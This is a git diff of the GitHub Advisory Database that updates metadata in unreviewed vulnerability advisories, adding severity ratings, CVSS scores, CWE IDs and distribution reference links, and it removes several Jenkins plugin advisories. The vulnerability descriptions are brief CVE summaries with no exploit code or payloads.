 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29345"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-07T18:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json b/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json
index 2d95442996800..df21287caaf16 100644
--- a/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json
+++ b/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.couchbase.com/alerts/"
diff --git a/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json b/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json
index 52618966891ca..5a9a64e18116d 100644
--- a/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json
+++ b/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-943x-93ff-jr62",
- "modified": "2023-06-26T21:31:00Z",
+ "modified": "2024-01-31T18:31:17Z",
 "published": "2023-06-26T21:31:00Z",
 "aliases": [
 "CVE-2023-3421"
 ],
 "details": "Use after free in Media in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -25,13 +28,33 @@
 {
 "type": "WEB",
 "url": "https://crbug.com/1447568"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.debian.org/security/2023/dsa-5440"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1751"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-26T21:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json b/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json
deleted file mode 100644
index df02744fbe68f..0000000000000
--- a/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9pvw-8q92-hm9w",
- "modified": "2023-06-23T15:30:41Z",
- "published": "2023-06-14T15:30:37Z",
- "aliases": [
- "CVE-2023-35143"
- ],
- "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35143"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3156"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-06-14T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json b/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json
index 2a1ff261b4819..579501c56e3bd 100644
--- a/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json
+++ b/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5428"
diff --git a/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json b/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json
index 30d3bc6dacd69..0cfd5f4dec4aa 100644
--- a/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json
+++ b/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f47p-g3vj-j588",
- "modified": "2023-06-23T21:30:33Z",
+ "modified": "2024-02-05T18:31:35Z",
 "published": "2023-06-23T21:30:33Z",
 "aliases": [
 "CVE-2023-35759"
 ],
 "details": "In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -21,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://community.progress.com/s/article/Product-Alert-Bulletin-June-2023"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176978/WhatsUp-Gold-2022-22.1.0-Build-39-Cross-Site-Scripting.html"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-23T20:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json b/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json
index 91aa6f0435352..dc26816407568 100644
--- a/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json
+++ b/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gqjh-f545-vcx3",
- "modified": "2023-06-26T21:31:00Z",
+ "modified": "2024-01-31T18:31:17Z",
 "published": "2023-06-26T21:31:00Z",
 "aliases": [
 "CVE-2023-3422"
 ],
 "details": "Use after free in Guest View in Google Chrome prior to 114.0.5735.198 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -25,13 +28,29 @@
 {
 "type": "WEB",
 "url": "https://crbug.com/1450397"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.debian.org/security/2023/dsa-5440"
 }
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-26T21:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json b/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json
index 4354b205fc175..3c8203c5811cb 100644
--- a/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json
+++ b/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202311-11"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5428"
diff --git a/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json b/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json
deleted file mode 100644
index f257b936e3573..0000000000000
--- a/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-rr3p-5fcf-v5m3",
- "modified": "2023-06-23T18:30:21Z",
- "published": "2023-06-14T15:30:37Z",
- "aliases": [
- "CVE-2023-35142"
- ],
- "details": "Jenkins Checkmarx Plugin 2022.4.3 and earlier disables SSL/TLS validation for connections to the Checkmarx server by default.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35142"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2870"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-295"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-06-14T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json b/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json
index 12956ab6a6aef..ead3339d3b242 100644
--- a/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json
+++ b/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rv3g-cgph-cc24",
- "modified": "2023-06-23T18:30:22Z",
+ "modified": "2024-02-02T15:30:28Z",
 "published": "2023-06-14T21:30:40Z",
 "aliases": [
 "CVE-2023-34565"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-06-14T21:15:09Z"
diff --git a/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json b/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json
deleted file mode 100644
index 501ffe1565ef7..0000000000000
--- a/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-whgj-6m78-2gg9",
- "modified": "2023-06-23T18:30:21Z",
- "published": "2023-06-14T15:30:37Z",
- "aliases": [
- "CVE-2023-35147"
- ],
- "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35147"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3099"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-732"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-06-14T13:15:12Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json b/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json
index 9ed11de9fb12e..5e28cb54ec687 100644
--- a/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json
+++ b/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json
@@ -32,6 +32,10 @@
 {
 "type": "WEB",
 "url": "https://zigrin.com/advisories/misp-stored-xss/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176975/MISP-2.4.171-Cross-Site-Scripting.html"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json b/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json
deleted file mode 100644
index 4814d39a0747f..0000000000000
--- a/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-27pr-r7hm-c2rc",
- "modified": "2023-07-19T18:30:55Z",
- "published": "2023-07-19T18:30:55Z",
- "aliases": [
- "CVE-2023-32261"
- ],
- "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.\nSee the following Jenkins security advisory for details: * https://www.jenkins.io/security/advisory/2023-06-14/ https://www.jenkins.io/security/advisory/2023-06-14/ \n\n\n\n\n",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32261"
- },
- {
- "type": "WEB",
- "url": "https://plugins.jenkins.io/dimensionsscm/"
- },
- {
- "type": "WEB",
- "url": "https://portal.microfocus.com/s/article/KM000019297"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-06-14/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-07-19T16:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json b/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json
index 014b4ea6b7f7e..c8035c4bd5e69 100644
--- a/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json
+++ b/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3p3x-vg38-6g9q",
- "modified": "2023-07-28T21:30:34Z",
+ "modified": "2024-02-04T09:30:42Z",
 "published": "2023-07-19T12:31:02Z",
 "aliases": [
 "CVE-2023-3446"
@@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230803-0011/" @@ -70,7 +74,7 @@ "cwe_ids": [ "CWE-1333" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-19T12:15:10Z" diff --git a/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json b/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json index d8a308418714e..2b31cd645f0a4 100644 --- a/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json +++ b/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34966" diff --git a/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json b/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json index d5b2fb5ee0baf..5420541f2f195 100644 --- a/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json +++ b/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5g4j-78x8-fff7", - "modified": "2023-08-23T18:30:29Z", + "modified": "2024-02-01T18:31:04Z", "published": "2023-07-06T19:24:04Z", "aliases": [ "CVE-2022-3703" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-345" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2022-11-10T22:15:00Z" 
diff --git a/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json b/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json index 0cf1b25a244ea..a7cbcc80248f4 100644 --- a/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json +++ b/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-73p2-7vjh-9qx4", - "modified": "2023-11-30T18:31:13Z", + "modified": "2024-01-30T00:30:28Z", "published": "2023-07-21T00:30:23Z", "aliases": [ "CVE-2023-25835" diff --git a/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json b/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json index 133f6d3f4c652..afba335073740 100644 --- a/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json +++ b/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0404" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0569" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3019" diff --git a/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json b/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json index b6800a81c4923..4a37e198128a5 100644 --- a/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json +++ b/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7rhj-qr35-3pvg", - "modified": "2023-11-29T21:30:16Z", + "modified": "2024-01-30T00:30:29Z", "published": "2023-07-21T06:30:17Z", "aliases": [ "CVE-2023-25837" 
diff --git a/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json b/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json index 464daecdc3033..27392eef60d29 100644 --- a/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json +++ b/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7x98-4rw8-872g", - "modified": "2024-01-25T21:32:11Z", + "modified": "2024-01-30T18:30:18Z", "published": "2023-07-25T18:30:32Z", "aliases": [ "CVE-2023-3772" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3772" diff --git a/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json b/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json index e2b19288ba392..6f4c5e1ffa93a 100644 --- a/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json +++ b/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34967" diff --git a/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json b/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json deleted file mode 100644 index 2145c1fbff6aa..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json +++ /dev/null 
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8hc6-w44m-wfxf",
- "modified": "2023-07-19T18:30:56Z",
- "published": "2023-07-19T18:30:56Z",
- "aliases": [
- "CVE-2023-32263"
- ],
- "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability could be exploited to retrieve a login certificate if an authenticated user is duped into using an attacker-controlled Dimensions CM server. This vulnerability only applies when the Jenkins plugin is configured to use login certificate credentials.\n\n\n https://www.jenkins.io/security/advisory/2023-06-14/ \n\n",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32263"
- },
- {
- "type": "WEB",
- "url": "https://plugins.jenkins.io/dimensionsscm/"
- },
- {
- "type": "WEB",
- "url": "https://portal.microfocus.com/s/article/KM000019293"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-07-19T16:15:09Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json b/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json
index ffe0c1740de09..3406589ed9ced 100644
--- a/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json
+++ b/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-08"
+ },
 {
 "type": "WEB",
 "url": "https://security.netapp.com/advisory/ntap-20230818-0014/"
diff --git a/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json b/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json index 168742b52c384..92e0c2ee6861f 100644 --- a/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json +++ b/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34968" diff --git a/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json b/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json index b07b85b1957b8..1d48b79afb8fa 100644 --- a/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json +++ b/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0448" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3567" diff --git a/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json b/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json index e15f8741efd8b..2d09d15e5861b 100644 --- a/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json +++ b/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0003/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5480" 
